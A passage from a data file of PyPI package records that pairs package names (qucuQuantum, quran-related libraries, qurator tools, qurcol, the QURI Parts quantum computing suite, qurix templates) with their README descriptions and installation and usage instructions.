\u5f00\u53d1\u7684\u91cf\u5b50\u7ebf\u8def\u6a21\u62df\u5668\uff0c\u53ef\u4e0e\u542f\u79d1\u91cf\u5b50\u7f16\u7a0b\u6846\u67b6QuTrunk\u96c6\u6210\uff0c\u5b9e\u73b0\u57fa\u4e8e\u672c\u5730GPU\u670d\u52a1\u5668\u7684\u91cf\u5b50\u7ebf\u8def\u6a21\u62df\u8ba1\u7b97\u52a0\u901f\u3002qucuQuantum \u76ee\u524d\u53ea\u652f\u6301 State Vector \u7684\u91cf\u5b50\u7ebf\u8def\u6a21\u62dfqucuQuantum \u57fa\u4e8e Python \u8bed\u8a00\uff0c\u63d0\u4f9b\u95e8\u7ea7\u522b\u7684 API\uff0c \u5305\u62ecH, CH, P, CP, R, CR, Rx, Ry, Rz, Rxx, Ryy, Rzz, X, Y, Z, S, T, Sdg, Tdg, SqrtX, CSqrtX, SqrtSwap, Swap, CSwap, CNot, MCX, CY, MCZ, U1, U2, U3, U, CU, ISwap, SqrtXdg, PH\u7b49\u91cf\u5b50\u95e8qucuQuantum \u76ee\u524d\u53ea\u652f\u6301\u4e0eQuTrunk\u672c\u5730\u96c6\u6210\uff0c\u9700\u8981\u4e0eQuTrunk\u90e8\u7f72\u5728\u540c\u4e00\u53f0 NVIDIA GPU \u670d\u52a1\u5668\u4e0a\u3002\u4e0b\u8f7d\u548c\u5b89\u88c5qucuQuantum \u4f5c\u4e3a\u72ec\u7acb\u7684\u5e93\uff0c\u4e0e runtime \u96c6\u6210\uff0c\u7531 runtime \u5b8c\u6210\u90e8\u7f72\u5b89\u88c5\u3002\u4f7f\u7528\u65b9\u6cd5qucuQuantum \u5e93\u5f15\u5165QuTrunk\u4ee3\u7801\u4e2dfrom qucuQuantum.cuQuantum import BackendcuQuantum\u5728QuTrunk\u4ee3\u7801\u4e2d\uff0c\u6784\u9020QCircuit\u5bf9\u8c61\u65f6\uff0c\u6307\u5b9abackend\u4e3aBackendcuQuantum,circuit = QCircuit(backend=BackendcuQuantum())\u793a\u4f8b\u4ee3\u7801\u4ee5\u4e0b\u793a\u4f8b\u5c55\u793a\u4e86\u5229\u7528 QuTrunk \u8fd0\u884c bell-pair \u91cf\u5b50\u7b97\u6cd5\uff1a# import packagefromqutrunk.circuitimportQCircuitfromqutrunk.circuit.gatesimportH,CNOT,Measure,AllfromqucuQuantum.cuQuantumimportBackendcuQuantum# allocate resourceqc=QCircuit(backend=BackendcuQuantum())qr=qc.allocate(2)# apply quantum gatesH*qr[0]CNOT*(qr[0],qr[1])All(Measure)*qr# print circuitqc.print()# run circuitres=qc.run(shots=1024)# print resultprint(res.get_counts())# draw circuitqc.draw()\u8fd0\u884c\u7ed3\u679c\uff1a\u8bb8\u53ef\u8bc1qucuQuantum \u662f\u81ea\u7531\u548c\u5f00\u6e90\u7684\uff0c\u5728Apache 2.0\u8bb8\u53ef\u8bc1\u7248\u672c\u4e0b\u53d1\u5e03\u3002** \u4f9d\u8d56 **\u5185\u5bb9\u8981\u6c42GPU \u67b6\u6784Volta, Turing, Ampere, Ada, HopperNVIDIA GPU Compute Capability7.0+CUDA11.xCPU \u67b6\u6784x86_64, ppc64Ie, ARM64\u64cd\u4f5c\u7cfb\u7edfLinuxGPU \u9a71\u52a8450.80.02+ (Linux)"} +{"package": "quran", "pacakge-description": "Quran.com APIThis is a python wraper forquran.comv3 apiAPI will respond with English content by default, but you can get content in other language for most api calls using language query parameters. You can pass language id or language iso code as query string value. For list of available language seelanguagesendpoint.Using quran.comInstallingpython3-mpipinstallgit+https://github.com/dreygur/Quran.com.gitorpipinstallgit+https://github.com/dreygur/Quran.com.gitImporting Quran:fromquranimportQuranqur=Quran()MethodsfromquranimportQuranqur=Quran()# All the methods returns a dictionary object# Getting all Recitationsqur.get_recitations# Getting all available Translationsqur.get_translations()# Getting all avalailable Languagesqur.get_languages()# Getting all Tafsirs available in this apiqur.get_tafsirs()# Getting all Chapters namesqur.get_chapter(6,info=True,language='bn')# Keyworded arguments are optional# Getting all the Verses from a chapterqur.get_verses(6)"} +{"package": "quranallsbuforuni", "pacakge-description": "First Python Package"} +{"package": "quranbot-schema-registry", "pacakge-description": "No description available on PyPI."} +{"package": "qurancorpus", "pacakge-description": "A python api for the Quranic Arabic Corpus project"} +{"package": "quranerabdar", "pacakge-description": "second Python Package"} +{"package": "quranic-nlp", "pacakge-description": "QuaranicTools: A Python NLP Library for Quranic NLPLanguage Processing and Digital Humanities Lab (Language.ML)Part of Speech Tagging|Dependency Parsing|Lemmatizer|Multilingual Search|Quranic Extractions|Revelation Order|Embeddings (coming soon)|TranslationsQuranic NLPQuranic NLP is a computational toolbox to conduct various syntactic and semantic analyses of Quranic verses. The aim is to put together all available resources contributing to a better understanding/analysis of the Quran for everyone.Contents:InstallationPipline (dep,pos,lem,root)ExampleFormat inputsInstallationTo get started using Quranic NLP in your python project, you may simply install it via the pip package.Install with pippipinstallquranic-nlpYou can check therequirements.txtfile to see the required packages.PipelineThe NLP pipeline contains morphological information e.g., Lemmatizer as well as POS Tagger and Dependancy Parser in aSpacy-like pipeline.fromquranic_nlpimportlanguagetranslation_translator='fa#1'pips='dep,pos,root,lemma'nlp=language.Pipeline(pips,translation_translator)Docobject has different extensions.\nFirst, there aresentencesindocreferring to the verses.\nSecond, there areayahindocwhich is indicate number ayeh in soure.\nThird, there aresurahindocwhich is indicate name of soure.\nFourth, there arerevelation_orderindocwhich is indicate order of revelation of the ayeh.docwhich is the list ofTokenalso has its own extensions.\nThe pips is information to use from quranic_nlp.\nThe translation_translator is language for translate quran such that language (fa) or language along with # along with number books.\nFor see all translate run below codefromquranic_nlpimportutilsutils.print_all_translations()Quranic NLP has its own spacy extensions. If related pipeline is not called, that extension cannot be used.Format InputsThere are three ways to format the input.\nFirst, number surah along with # along with number ayah.\nSecond, name surah along with # along with number ayah.\nThird, search text in quran.Note The last two calls require access to the net for an API call.fromquranic_nlpimportlanguagetranslation_translator='fa#1'pips='dep,pos,root,lemma'nlp=language.Pipeline(pips,translation_translator)doc=nlp('1#1')doc=nlp('\u062d\u0645\u062f#1')doc=nlp('\u0631\u0628 \u0627\u0644\u0639\u0627\u0644\u0645\u06cc\u0646')Examplefromquranic_nlpimportlanguagetranslation_translator='fa#1'pips='dep,pos,root,lemma'nlp=language.Pipeline(pips,translation_translator)doc=nlp('1#4')print(doc)print(doc._.text)print(doc._.surah)print(doc._.ayah)print(doc._.revelation_order)print(doc._.sim_ayahs)print(doc._.translations)\u0625\u0650\u064a\u0651\u064e\u0627\u0643\u064e \u0646\u064e\u0639\u0652\u0628\u064f\u062f\u064f \u0648\u064e \u0625\u0650\u064a\u0651\u064e\u0627\u0643\u064e \u0646\u064e\u0633\u0652\u062a\u064e\u0639\u0650\u064a\u0646\u064f \u0646\u062d\u0646 \u0646\u062d\u0646\n\u0625\u0650\u064a\u0651\u064e\u0627\u0643\u064e \u0646\u064e\u0639\u0652\u0628\u064f\u062f\u064f \u0648\u064e \u0625\u0650\u064a\u0651\u064e\u0627\u0643\u064e \u0646\u064e\u0633\u0652\u062a\u064e\u0639\u0650\u064a\u0646\u064f \n\u0641\u0627\u062a\u062d\u0647\n4\n63\n['82#15', '83#11', '70#26', '51#12', '56#56', '82#17', '74#46', '37#20', '82#18', '15#35', '38#78', '26#82', '109#6', '51#6', '82#9', '107#1', '95#7', '40#16', '19#15', '19#33', '61#9', '9#33', '48#28', '21#103', '6#73', '3#26', '98#5', '83#5', '39#11', '40#14', '77#12', '50#42', '77#35', '77#13', '39#2', '36#71', '74#9', '85#2', '16#52', '30#30', '42#13', '75#1', '30#43', '75#6', '40#29', '39#14', '43#77', '5#3', '86#9', '26#189', '40#65', '26#87', '38#81', '15#38', '7#51', '23#113', '23#16', '79#6', '51#13', '77#14', '37#26', '9#11', '3#24', '114#2', '82#19', '11#103', '34#40', '26#135', '25#25', '70#8', '2#193', '9#29', '19#38', '2#132', '7#14', '29#65', '8#39', '64#9', '30#14', '45#27', '10#105', '110#2', '78#17', '79#35', '83#6', '77#38', '50#34', '38#79', '15#36', '37#21', '44#40', '52#9', '56#50', '90#14', '40#32', '9#36', '80#34', '26#88', '56#86', '50#20']\n\u062a\u0646\u0647\u0627 \u062a\u0648 \u0631\u0627 \u0645\u0649 \u067e\u0631\u0633\u062a\u064a\u0645 \u0648 \u062a\u0646\u0647\u0627 \u0627\u0632 \u062a\u0648 \u064a\u0627\u0631\u0649 \u0645\u0649\u200c\u062c\u0648\u064a\u064a\u0645.print(doc[1])print(doc[1].head)print(doc[1].dep_)print(doc[1]._.dep_arc)print(doc[1]._.root)print(doc[1].lemma_)print(doc[1].pos_)\u0646\u064e\u0639\u0652\u0628\u064f\u062f\u064f\n\u0648\u064e\n\u0645\u0639\u0637\u0648\u0641 \u0628\u0631 \u0645\u062d\u0644\nLTR\n\u0639\u0628\u062f\n\nVERBTo jsonify the results you can use the following:dictionary=language.to_json(pips,doc)print(dictionary)[{'id':1,'text':\u0627\u0644\u0652,'root':None,'lemma':'','pos':'INTJ','rel':'\u062a\u0639\u0631\u06cc\u0641','arc':'RTL','head':\u062d\u064e\u0645\u0652\u062f\u064f},{'id':2,'text':\u062d\u064e\u0645\u0652\u062f\u064f,'root':'\u062d\u0645\u062f','lemma':'','pos':'NOUN','rel':'\u062e\u0628\u0631','arc':'LTR','head':*},{'id':3,'text':\u0644\u0650,'root':None,'lemma':'','pos':'INTJ','rel':'\u0645\u062a\u0639\u0644\u0642','arc':'LTR','head':*},{'id':4,'text':\u0644\u0651\u064e\u0647\u0650,'root':'\u0623\u0644\u0647','lemma':'','pos':'NOUN','rel':'\u0646\u0639\u062a','arc':'LTR','head':\u0631\u064e\u0628\u0651\u0650},{'id':5,'text':\u0631\u064e\u0628\u0651\u0650,'root':'\u0631\u0628\u0628','lemma':'','pos':'NOUN','rel':'\u0645\u0636\u0627\u0641 \u0627\u0644\u06cc\u0647 ','arc':'LTR','head':\u0639\u064e\u0627\u0644\u064e\u0645\u0650\u06cc\u0646\u064e},{'id':6,'text':\u0627\u0644\u0652,'root':None,'lemma':'','pos':'INTJ','rel':'\u062a\u0639\u0631\u06cc\u0641','arc':'RTL','head':\u0639\u064e\u0627\u0644\u064e\u0645\u0650\u06cc\u0646\u064e},{'id':7,'text':\u0639\u064e\u0627\u0644\u064e\u0645\u0650\u06cc\u0646\u064e,'root':'\u0639\u0644\u0645','lemma':'','pos':'NOUN','rel':'','arc':None,'head':\u0639\u064e\u0627\u0644\u064e\u0645\u0650\u06cc\u0646\u064e},{'id':8,'text':*,'root':None,'lemma':'','pos':'','rel':'','arc':None,'head':*}]To jsonify the results you can use the following:fromspacyimportdisplacyfromquranic_nlpimportlanguagefromquranic_nlpimportutilstranslation_translator='fa#1'pips='dep,pos,root,lemma'nlp=language.Pipeline(pips,translation_translator)doc=nlp('1#4')displacy.serve(doc,style=\"dep\")options={\"compact\":True,\"bg\":\"#09a3d5\",\"color\":\"white\",\"font\":\"xb-niloofar\"}displacy.serve(doc,style=\"dep\",options=options)"} +{"package": "quranpy", "pacakge-description": "quranpyPython Package to interact with the Glorious Qur'an!This package uses theAl Quran CloudAPI to bring you verses and surahs of the Qur'an.Start by importing the package:importquranpyFeatures:Get verses of the Qur'an on demandverses=quranpy.show_verses(ayah=\"112:2-4\",edition=quranpy.Editions.sahih_international)print(verses)# will show Surah Ikhlas verses 2, 3 and 4 with Sahih International translation['Allah, the Eternal Refuge.','He neither begets nor is born,','Nor is there to Him any equivalent.\"']Easy info on Surahs of the Qur'anal_lail=quranpy.Surah(chapter=quranpy.Chapters.layl,edition=quranpy.Editions.pickthall# will show the Pickthall translations)print(str(al_lail))print(al_lail.number)print(al_lail.arabic_name)print(al_lail.name)print(al_lail.translation)print(al_lail.period)print(al_lail.show_verses(\"1-3\"))Surah Al-Lail - The Night\n92\n\u0633\u0648\u0631\u0629 \u0627\u0644\u0644\u064a\u0644\nAl-Lail\nThe Night\nMeccan\n[By the night enshrouding, And the day resplendent, And Him Who hath created male and female,]Search for terms which appear in the Qur'anresults=quranpy.Search(term=\"Moses\",edition=quranpy.Editions.yusufali,surah=quranpy.Chapters.anbiya)print(results)print(results.verses)2 count(s) of \"Moses\" in Surah Al-Anbiyaa (in this edition)\n[In the past We granted to Moses and Aaron the criterion (for judgment), and a Light and a Message for those who would do right,-, Before this We wrote in the Psalms, after the Message (given to Moses): My servants the righteous, shall inherit the earth.\"]For more information,read the documentation.Seetest.pyfor more in depth examples and ways to use the lib.Assalamwalaikum warahmatullahi wa barakatuhu!"} +{"package": "quran.py", "pacakge-description": "quran.pyAn easy to use API wrapper for Quran.com v4 written in Python.InstallationUse the package managerpipto install. (Gitrequired as well.)pipinstallgit+https://github.com/Jadtz/quran.py.gitUsagefromquran.versesimportVersesvrs=Verses()vrs.get_chapter()# returns complete chapter from Quran.vrs.get_juz()# returns all verses from a specific juz(1-30).vrs.get_page()# returns all verses of a specific Madani Mushaf page(1 to 604).vrs.get_hizb()# returns all verses from a specific Hizb( half(1-60).vrs.get_rub()# returns all verses of a specific Rub number(1-240).vrs.get_verse()# returns a specific ayah with key.#example for verse key, \"10:5\" is 5th ayah of 10th surah.ContributingPull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.Please make sure to update tests as appropriate.LicenseMIT"} +{"package": "quran-rofi", "pacakge-description": "Al-Quran RofiAl-Quran dengan Terjemahan / Tafsir JalalaynInstallRequirementsRofixclipInstallasipip install quran-rofiConfigurePengaturan font Quran dan Murotal ada di file~/.config/quran-rofi.ini, untuk contoh confignya adadisiniFile Murotal ada di folder~/.local/share/Quran/murotal/, untuk contoh formatnya adadisiniFontUpdate cache font dengan :$ fc-cache -fvPreview Al-Quran RofiPerubahan0.1.8Menggunakanalquran-id0.1.10Menambahkan fitur murotal"} +{"package": "qurator-sbb-tools", "pacakge-description": "This package currently provides:A set of tools to perform NER+EL on the digitalized collections of the SBB.A set of tools for Wikidata/Wikipedia knowledge-base extraction.A set of tools to perform and visualize topic-modelling on the digitalized collections of the SBB.Installation:Setup virtual environment:virtualenv --python=python3.6 venvActivate virtual environment:source venv/bin/activateUpgrade pip:pip install -U pipInstall package together with its dependencies in development mode:pip install -e ./"} +{"package": "qurator-sbb-utils", "pacakge-description": "This package provides shared functionality forsbb_toolssbb_knowledge-basesbb_nersbb_nedsbb_topic-modellingsbb_web_integrationpage2tsvInstallation:Setup virtual environment:virtualenv --python=python3.6 venvActivate virtual environment:source venv/bin/activateUpgrade pip:pip install -U pipInstall package together with its dependencies in development mode:pip install -e ./"} +{"package": "qurator-tsvtools", "pacakge-description": "TSV - Processing ToolsCreate .tsv files that can be viewed and edited withneat.Installation:Clone this project and theSBB-utils.Setup virtual environment:virtualenv --python=python3.6 venvActivate virtual environment:source venv/bin/activateUpgrade pip:pip install -U pipInstall package together with its dependencies in development mode:pip install -e sbb_utils\npip install -e page2tsvPAGE-XML to TSV Transformation:Create a TSV file from OCR in PAGE-XML format (with word segmentation):page2tsv PAGE1.xml PAGE.tsv --image-url=http://link-to-corresponding-image-1In order to create a TSV file for multiple PAGE XML files just perform successive calls\nof the tool using the same TSV file:page2tsv PAGE1.xml PAGE.tsv --image-url=http://link-to-corresponding-image-1\npage2tsv PAGE2.xml PAGE.tsv --image-url=http://link-to-corresponding-image-2\npage2tsv PAGE3.xml PAGE.tsv --image-url=http://link-to-corresponding-image-3\npage2tsv PAGE4.xml PAGE.tsv --image-url=http://link-to-corresponding-image-4\npage2tsv PAGE5.xml PAGE.tsv --image-url=http://link-to-corresponding-image-5\n...\n...\n...For instance, for the fileexample.xml:page2tsv example.xml example.tsv --image-url=http://content.staatsbibliothek-berlin.de/zefys/SNP27646518-18800101-0-3-0-0/left,top,width,height/full/0/default.jpgProcessing of already existing TSV files:Create a URL-annotated TSV file from an existing TSV file:annotate-tsv enp_DE.tsv enp_DE-annotated.tsvCommand-line interface:page2tsv [OPTIONS] PAGE_XML_FILE TSV_OUT_FILE\n\nOptions:\n --purpose [NERD|OCR] Purpose of output tsv file.\n \n NERD: NER/NED application/ground-truth creation.\n \n OCR: OCR application/ground-truth creation.\n \n default: NERD.\n --image-url TEXT\n --ner-rest-endpoint TEXT REST endpoint of sbb_ner service. See\n https://github.com/qurator-spk/sbb_ner for\n details. Only applicable in case of NERD.\n --ned-rest-endpoint TEXT REST endpoint of sbb_ned service. See\n https://github.com/qurator-spk/sbb_ned for\n details. Only applicable in case of NERD.\n --noproxy disable proxy. default: enabled.\n --scale-factor FLOAT default: 1.0\n --ned-threshold FLOAT\n --min-confidence FLOAT\n --max-confidence FLOAT\n --ned-priority INTEGER\n --help Show this message and exit."} +{"package": "qurcol", "pacakge-description": "qurcol - view, query and convert columnar storage files from command linequrcol(as in \"query columnar ...\") is a tool that enables its users to\nquickly explore the content of a file in a column-oriented storage format (likeApache Parquet, for example), using command line\nonly and without the need for more complex software like Spark or Pandas.It allows viewing the file content, schema, querying the content with SQL and\nconverting the data to CSV.This tool only targets the use case of a basic exploration of a file content.\nThe author believes that aforementioned Spark, Pandas, etc. should be used\ninstead in any scenario which goes beyond that.FeaturesCommand line tool to:view a columnar file contentprint a columnar file schemaconvert a columnar file to a CSV filerun SQL queries on the data from a columnar fileList of supported columnar file formats:Apache ParquetUsers should be aware of the size of the source files and keep in mind that\nthe file is read in memory when being processed by this tool.StatusThis software is generally available. This software is intended to be used in\ncommand line by individual users. It is not intended for use in a production\nenvironment.The software is provided \"as is\", without warranty of any kind, express or\nimplied, including but not limited to the warranties of merchantability,\nfitness for a particular purpose and noninfringement. In no event shall the\nauthors or copyright holders be liable for any claim, damages or other\nliability, whether in an action of contract, tort or otherwise, arising from,\nout of or in connection with the software or the use or other dealings in the\nsoftware.InstallationInstall from PyPI:pip install [--user] qurcolAlternatively, you can download a release from the Release page in GitHub.UsageBuilt-in help provides detailed usage information with examples:qurcol --helpFew examples are given below to demonstrate the usage. Please, refer to the\nbuilt-in help for all details though (it is not practical to keep a duplicate\nof the \"help\" in this README).Print an extract (few first rows, few last rows) of the file content:qurcol view [[--head=N] [--tail=N] | [--all]] [--output=table|csv] FILEFor example, view to the snippet of a file content:qurcol view FILEor, export entire file in CSV format:qurcol --all --output=csv FILE > OUTPUT_FILEPrint the file schema:qurcol schema [--output=table|csv] FILERun an inline SQL query on the file content:qurcol sql -c FILE \"QUERY\"SQL syntaxqurcol sqlcommand loads the file into an in-memory SQLite database. Therefore,\ndata types and SQL syntax are those of SQLite v.3. The command will attempt\nits best to map the data types from the source file to the data types available\nin SQLite, but users should be aware of the fact that SQLite data types are\noften less expressive (for example, there is no data type to represent\ndate/time information).Data is loaded into a table with the namedata.Finally, for a complete example, the following command:qurcol sql -c --output=csv FILE \"select * from data\"will have same effect as:qurcol view --all --output=csv FILEWhy?Here are few sample use cases:As a Data Engineer I want to review the schema of a file in a data\nlake, in order to consume them accordingly in my software.As a Data Ops Engineer I want to review the content of the sample file from\na data lake, in order to ensure that the data is being produced into it.As a Data Engineer I want to query some data from a file in a data lake, in\norder to review/confirm the properties of the data I am going to use.As a Product Manager I want to load into a spreadsheet the.parquetfile\nshared with me by Data Science team, in order to review its content.Not featuresFor any tool it is equally important to know what can and and what cannot be\ndone with it. Following potential features were considered for inclusion but\ndecided to be not in the current scope of this tool, unless a clear use case is\ndefined for them.Conversion to other \"complex\" data formats (e.g. Excel), because it will add\nmore dependencies to the tool, while CSV can be imported to a spreadsheet\neasily.Reading data from files in other \"file systems\" (HDFS, S3, etc.), because\nthere exist command line tools to \"dowload\" data from these.Any advanced data exploration and plotting, because there is no single way\nto do that. You may use a combination ofJupyter,PandasandSeaborninstead, for example.Any advanced form of querying the data that goes beyond SQL. You may usePandasorApache\nSparkinstead, for example.ContributionsContributions are very welcome. Please, feel free to submit an issue or create\na Pull Request.Development environmentThis software is written in Python 3, and has a modern development environment\nthat depends onPoetryandNox.Run all tests:nox -s testsOr, to quickly run tests on a single Python version only:poetry run pytest --covRun linters:nox lintReformat code:nox -s blackOr, check code format without reformatting:nox -s black -- --check .Full pre-commit check:noxNote: Nox is configured to reuse virtualenvs by default; if you want to run Nox\nin a clean environment, add--no-reuse-existing-virtualenvsargument.Criteria for Pull RequestsThe PR should pass on CI. CI is configured to run all essential controls\n(tests, flake8, mypy, black). You can easily run same controls in a local\ndevelopment environment before the PR submission.Beyond code formatting, please, try to stick to the overall code style, such\nas the choice of variable names, code structure, etc.LicenseLicensed under theApache License v2.0."} +{"package": "quri-parts", "pacakge-description": "QURI PartsQURI Parts is an open source library suite for creating and executing quantum algorithms on various quantum computers and simulators. QURI Parts focuses on the followings:Modularity and extensibility: It provides small parts with which you can assemble your own algorithms. You can also use ready-made algorithms, customizing their details by replacing sub components easily.Platform independence: Once you assemble an algorithm with QURI Parts, you can execute it on various quantum computers or simulators without modifying the main algorithm code. Typically you only need to replace a few lines to switch to a different device or simulator.Performance: When dealing with a simulator, it is often the case that classical computation before and after quantum circuit simulation (such as data preparation and post processing) takes considerable time, spoiling performance of the simulator. We put an emphasis on computational performance and try to get the most out of simulators.Covered areas and componentsCurrent QURI Parts covers the following areas, provided as individual components.\nPlease note that more components will be added in future.\nYou are also encouraged to propose or author new components as necessary.Core componentsquri-parts-circuit: Quantum circuitGate, circuit, noise etc.quri-parts-core: General componentsOperator, state, estimator, sampler etc.Platform (device/simulator) supportQuantum circuit simulatorsquri-parts-qulacs:Qulacsquri-parts-stim:Stimquri-parts-itensor:ITensorquri-parts-tket:TKetQuantum platforms/SDKsquri-parts-braket:Amazon Braket SDKquri-parts-cirq:Cirq(Only circuit and operator conversion is supported yet)quri-parts-qiskit:Qiskitquri-parts-quantinuum:Quantinuumquri-parts-ionq:IONQIntermediate representation supportquri-parts-openqasm:OpenQASM 3.0quri-parts-algo: AlgorithmsAnsatz, optimizer, error mitigation etc.Chemistryquri-parts-chem: General conceptsFermion-qubit mapping, electron integrals, ansatz etc.quri-parts-pyscf:PySCFLibrary supportquri-parts-openfermion:OpenFermionInstallationQURI Parts requires Python 3.9.8 or later.Usepipto install QURI Parts.\nDefault installation only contains components not depending specific platforms (devices/simulators) or external libraries.\nYou need to specifyextraswith square brackets ([]) to use those platforms and external libraries with QURI Parts:# Default installation, no extras\npip install quri-parts\n\n# Use Qulacs, a quantum circuit simulator\npip install \"quri-parts[qulacs]\"\n\n# Use Amazon Braket SDK\npip install \"quri-parts[braket]\"\n\n# Use Qulacs and OpenFermion, a quantum chemistry library for quantum computers\npip install \"quri-parts[qulacs,openfermion]\"Currently available extras are as follows:qulacsbraketqiskitcirqopenfermionstimopenqasmitensorYou can also install individual components (quri-parts-*) directly.\nIn fact,quri-partsis a meta package, a convenience method to install those individual components.Installation from local source treeIf you check out the QURI Parts repository and want to install from that local source tree, you can userequirements-local.txt.\nInrequirements-local.txt, optional components are commented out, so please uncomment them as necessary.pip install -r requirements-local.txtDocumentation and tutorialsDocumentation of QURI Parts is available athttps://quri-parts.qunasys.com.Tutorialswould be a good starting point.Release notesSeeReleases pageon GitHub.Contribution guidelinesIf you are interested in contributing to QURI Parts, please take a look at ourcontribution guidelines.AuthorsQURI Parts developed and maintained byQunaSys Inc.. All contributors can be viewed onGitHub.LicenseQURI Parts is licensed underApache License 2.0."} +{"package": "quri-parts-algo", "pacakge-description": "QURI Parts AlgoQURI Parts Algo is a library containing implementations of algorithms for quantum computers.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-algoLicenseApache License 2.0"} +{"package": "quri-parts-braket", "pacakge-description": "QURI Parts BraketQURI Parts Braket is a support library for using Amazon Braket SDK with QURI Parts.\nYou can combine your code written in QURI Parts with this library to execute it on Amazon Braket.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-braketLicenseApache License 2.0"} +{"package": "quri-parts-chem", "pacakge-description": "QURI Parts ChemQURI Parts Chem is a library containing implementations of quantum computer algorithms for chemistry.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-chemLicenseApache License 2.0"} +{"package": "quri-parts-circuit", "pacakge-description": "QURI Parts CircuitQURI Parts Circuit is a platform-independent quantum circuit library.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-circuitLicenseApache License 2.0"} +{"package": "quri-parts-cirq", "pacakge-description": "QURI Parts CirqQURI Parts Cirq is a support library for using Cirq with QURI Parts.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-cirqLicenseApache License 2.0"} +{"package": "quri-parts-core", "pacakge-description": "QURI Parts CoreQURI Parts Core is a core component of QURI Parts, a platform-independent library for quantum computing.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-coreLicenseApache License 2.0"} +{"package": "quri-parts-honeywell", "pacakge-description": "QURI Parts HoneywellQURI Parts Honeywell is a support library for using Honeywell with QURI Parts.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-honeywellLicenseApache License 2.0"} +{"package": "quri-parts-ionq", "pacakge-description": "QURI Parts IonQQURI Parts IonQ is a support library for using IonQ with QURI Parts.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-ionqLicenseApache License 2.0"} +{"package": "quri-parts-itensor", "pacakge-description": "QURI Parts ITensorQURI Parts ITensor is a support library for using ITensor with QURI Parts.This library calls ITensor's Julia library from Python using JuliaCall, so you need to install Julia. To install Julia, seethe official documentation.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-itensorLicenseApache License 2.0"} +{"package": "quri-parts-openfermion", "pacakge-description": "QURI Parts OpenFermionQURI Parts OpenFermion is a support library for using OpenFermion with QURI Parts.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-openfermionLicenseApache License 2.0"} +{"package": "quri-parts-openqasm", "pacakge-description": "QURI Parts OpenQASMQURI Parts OpenFermion is a support library for using OpenQASM 3 with QURI Parts.Note: some gates (SqrtX, SqrtXdag, SqrtY, SqrtYdag) are not implemented yet.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-openqasmLicenseApache License 2.0"} +{"package": "quri-parts-pyscf", "pacakge-description": "QURI Parts PySCFQURI Parts PySCF is a support library for using PySCF with QURI Parts.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-pyscfLicenseApache License 2.0"} +{"package": "quri-parts-qiskit", "pacakge-description": "QURI Parts QiskitQURI Parts Qiskit is a support library for using Qiskit with QURI Parts.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-qiskitLicenseApache License 2.0"} +{"package": "quri-parts-quantinuum", "pacakge-description": "QURI Parts QuantinuumQURI Parts Quantinuum is a support library for using Quantinuum with QURI Parts.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-quantinuumLicenseApache License 2.0"} +{"package": "quri-parts-qulacs", "pacakge-description": "QURI Parts QulacsQURI Parts Qulacs is a support library for using Qulacs with QURI Parts.\nYou can combine your code written in QURI Parts with this library to execute it on Qulacs.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-qulacsLicenseApache License 2.0"} +{"package": "quri-parts-riqu", "pacakge-description": "QURI Parts riquriqu (RESTInterface forQuantum Computing) is an interface for using quantum computers\nthrough cloud services and designed by Center for Quantum Information and Quantum Biology, Osaka University (referred to as QIQB).QURI Parts riqu is a support library for using riqu interface with QURI Parts, developed by QIQB.This package is experimental and may undergo breaking changes without notice.\nUse it at your own risk.InstallationQURI Parts requires Python 3.9.8 or later.Usepipto install QURI Parts riqu.pip install quri-parts-riquInstallation from local source treeIf you check out the QURI Parts riqu repository and want to install from that local source tree, you can usepoetry installcommand.poetry installDocumentation and tutorialsQURI Parts DocumentationQURI Parts riqu DocumentationQURI Parts riqu TutorialsRepositoryQURI Parts RepositoryQURI Parts riqu RepositoryRelease notesSeeReleases pageon GitHub.Contribution guidelinesIf you are interested in contributing to QURI Parts, please take a look at ourcontribution guidelines.AuthorsQURI Parts riqu developed and maintained byQIQB. All contributors can be viewed onGitHub.LicenseApache License 2.0"} +{"package": "quri-parts-stim", "pacakge-description": "QURI Parts StimQURI Parts Stim is a support library for using Stim with QURI Parts.\nYou can combine your code written in QURI Parts with this library to execute it on Stim.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-stimLicenseApache License 2.0"} +{"package": "quri-parts-tket", "pacakge-description": "QURI Parts tketQURI Parts tket is a support library for using tket with QURI Parts.\nYou can combine your code written in QURI Parts with this library to execute it on tket.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-tketLicenseApache License 2.0"} +{"package": "qurix-package-template", "pacakge-description": "Python package templateTemplate for Python packages for qurix Technology.StructureA normal Python package will start with the namespacequrixas in this sample package. A sample structure is as follows:.\n\u251c\u2500\u2500 LICENCE\n\u251c\u2500\u2500 Makefile\n\u251c\u2500\u2500 README.md\n\u251c\u2500\u2500 qurix\n\u2502 \u2514\u2500\u2500 \n\u2502 \u2514\u2500\u2500 \n\u2502 \u251c\u2500\u2500 __init__.py\n\u2502 \u251c\u2500\u2500 __version__.py\n\u2502 \u2514\u2500\u2500 \n\u251c\u2500\u2500 requirements.txt\n\u251c\u2500\u2500 setup.py\n\u2514\u2500\u2500 tests\n \u251c\u2500\u2500 __init__.py\n \u2514\u2500\u2500 test_client.pyVersioning and releasePackage versions will be identified according tosemantic versioning. The release process will deploy in bothTest PyPIandPyPI.gitGraph\n commit\n branch staging\n branch feature/some-feature\n checkout feature/some-feature\n commit\n commit\n checkout staging\n merge feature/some-feature id: \"Test PyPI\"\n checkout main\n merge staging id: \"Release in PyPI\" tag: \"v0.1.0\"\n branch fix/some-fix\n checkout fix/some-fix\n commit\n checkout staging\n merge fix/some-fix id: \"Test PyPI again\"\n checkout main\n merge staging id: \"New fix release in PyPI\" tag: \"v0.1.1\"DeploymentUsing Github Actions. See.github/worfklows/"} +{"package": "qurix-sample-package", "pacakge-description": "Python package templateTemplate for Python packages for qurix Technology.StructureA normal Python package will start with the namespacequrixas in this sample package. A sample structure is as 